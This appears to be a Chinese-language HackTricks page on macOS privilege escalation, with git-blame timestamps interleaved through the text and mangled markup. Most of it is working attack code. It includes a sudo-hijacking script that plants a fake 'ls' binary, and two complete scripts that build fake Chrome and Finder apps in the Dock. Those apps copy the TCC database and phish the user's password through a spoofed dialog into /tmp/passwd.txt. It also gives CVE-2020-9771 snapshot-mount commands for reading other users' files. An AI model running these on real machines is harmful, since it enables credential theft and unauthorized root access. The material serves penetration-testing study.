2023-12-26 02:11:12 +00:00
# macOS 权限提升
2023-12-20 02:34:32 +00:00
< details >
2024-01-04 11:46:15 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
支持 HackTricks 的其他方式:
* 如果您希望在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2023-12-26 02:11:12 +00:00
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
2024-01-04 11:46:15 +00:00
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFT 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram 群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来**分享您的黑客技巧**。
2023-12-20 02:34:32 +00:00
< / details >
2023-12-26 02:11:12 +00:00
## TCC 权限提升
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
如果您是为了寻找 TCC 权限提升而来,请前往:
2023-12-20 02:34:32 +00:00
{% content-ref url="macos-security-protections/macos-tcc/" %}
[macos-tcc ](macos-security-protections/macos-tcc/ )
{% endcontent-ref %}
2023-12-26 02:11:12 +00:00
## Linux 权限提升
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
请注意,**影响 Linux/Unix 的大多数关于权限提升的技巧也会影响 MacOS** 机器。因此,请查看:
2023-12-20 02:34:32 +00:00
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation ](../../linux-hardening/privilege-escalation/ )
{% endcontent-ref %}
## 用户交互
2023-12-26 02:11:12 +00:00
### Sudo 劫持
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
您可以在 [Linux 权限提升文章中找到原始的 Sudo 劫持技术 ](../../linux-hardening/privilege-escalation/#sudo-hijacking )。
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
然而, macOS 在执行 ** `sudo` ** 时**保持**用户的 ** `PATH` **。这意味着实现这种攻击的另一种方法是**劫持其他二进制文件**,受害者在**运行 sudo 时**仍会执行这些文件:
2023-12-20 02:34:32 +00:00
```bash
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls < < EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls
# victim
sudo ls
```
2024-01-04 11:46:15 +00:00
请注意,使用终端的用户很可能已经安装了**Homebrew**。因此,可以劫持位于**`/opt/homebrew/bin`**中的二进制文件。
2023-12-20 02:34:32 +00:00
2023-12-26 02:11:12 +00:00
### Dock 伪装
2023-12-20 02:34:32 +00:00
2023-12-26 02:11:12 +00:00
利用一些**社会工程学**技巧, 你可以在dock中**伪装成例如Google Chrome**,实际上执行你自己的脚本:
2023-12-20 02:34:32 +00:00
{% tabs %}
2023-12-26 02:11:12 +00:00
{% tab title="Chrome 伪装" %}
2023-12-20 02:34:32 +00:00
一些建议:
2023-12-26 02:11:12 +00:00
* 检查Dock中是否有Chrome, 如果有, **移除**该项, 并在Dock数组中**添加**一个**假的** **Chrome项** ,放在相同的位置。 
2023-12-20 02:34:32 +00:00
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c < < EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat < < EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CFBundleExecutable< / key >
< string > Google Chrome< / string >
< key > CFBundleIdentifier< / key >
< string > com.google.Chrome< / string >
< key > CFBundleName< / key >
< string > Google Chrome< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
< / dict >
< / plist >
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Google Chrome.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
sleep 0.1
killall Dock
```
2023-12-26 02:11:12 +00:00
{% endtab %}
{% tab title="Finder 伪装" %}
2023-12-20 02:34:32 +00:00
一些建议:
2024-01-04 11:46:15 +00:00
* 你**不能从 Dock 中移除 Finder**,所以如果你要把它添加到 Dock, 你可以把假的 Finder 放在真正的 Finder 旁边。为此你需要**在 Dock 数组的开始处添加假 Finder 条目**。
2023-12-26 02:11:12 +00:00
* 另一个选项是不把它放在 Dock 上, 只是打开它, “Finder 请求控制 Finder”并不奇怪。
2024-01-04 11:46:15 +00:00
* 另一个不经过密码提示就**升级到 root** 的方法,是让 Finder 真的请求密码来执行特权操作:
* 要求 Finder 复制一个新的 ** `sudo` ** 文件到 ** `/etc/pam.d` **( 提示要求输入密码时会指出“Finder 想要复制 sudo”)
* 要求 Finder 复制一个新的 **授权插件** ( 你可以控制文件名, 所以提示要求输入密码时会指出“Finder 想要复制 Finder.bundle”)
2023-12-20 02:34:32 +00:00
```bash
#!/bin/sh
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
rm -rf /tmp/Finder.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources
# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c < < EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
# Info.plist
cat < < EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CFBundleExecutable< / key >
< string > Finder< / string >
< key > CFBundleIdentifier< / key >
< string > com.apple.finder< / string >
< key > CFBundleName< / key >
< string > Finder< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
< / dict >
< / plist >
EOF
# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Finder.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
sleep 0.1
killall Dock
```
{% endtab %}
{% endtabs %}
2023-12-26 02:11:12 +00:00
## TCC - Root 权限提升
2023-12-20 02:34:32 +00:00
2023-12-26 02:11:12 +00:00
### CVE-2020-9771 - mount\_apfs TCC 绕过和权限提升
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
**任何用户**(即使是非特权用户)都可以创建并挂载时间机器快照,并**访问该快照的所有文件**。\
2023-12-26 02:11:12 +00:00
所需的**唯一权限**是应用程序(如 `Terminal` )需要有**完全磁盘访问**( FDA) 权限( `kTCCServiceSystemPolicyAllfiles`),这需要由管理员授权。
2023-12-20 02:34:32 +00:00
{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
```
2024-01-04 11:46:15 +00:00
```markdown
2023-12-20 02:34:32 +00:00
{% endcode %}
## 敏感信息
2023-12-26 02:11:12 +00:00
这可以用来提升权限:
2023-12-20 02:34:32 +00:00
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md ](macos-files-folders-and-binaries/macos-sensitive-locations.md )
{% endcontent-ref %}
< details >
2024-01-04 11:46:15 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
2023-12-20 02:34:32 +00:00
2024-01-04 11:46:15 +00:00
其他支持HackTricks的方式:
* 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来**分享您的黑客技巧。
2023-12-20 02:34:32 +00:00
< / details >
2024-01-04 11:46:15 +00:00
```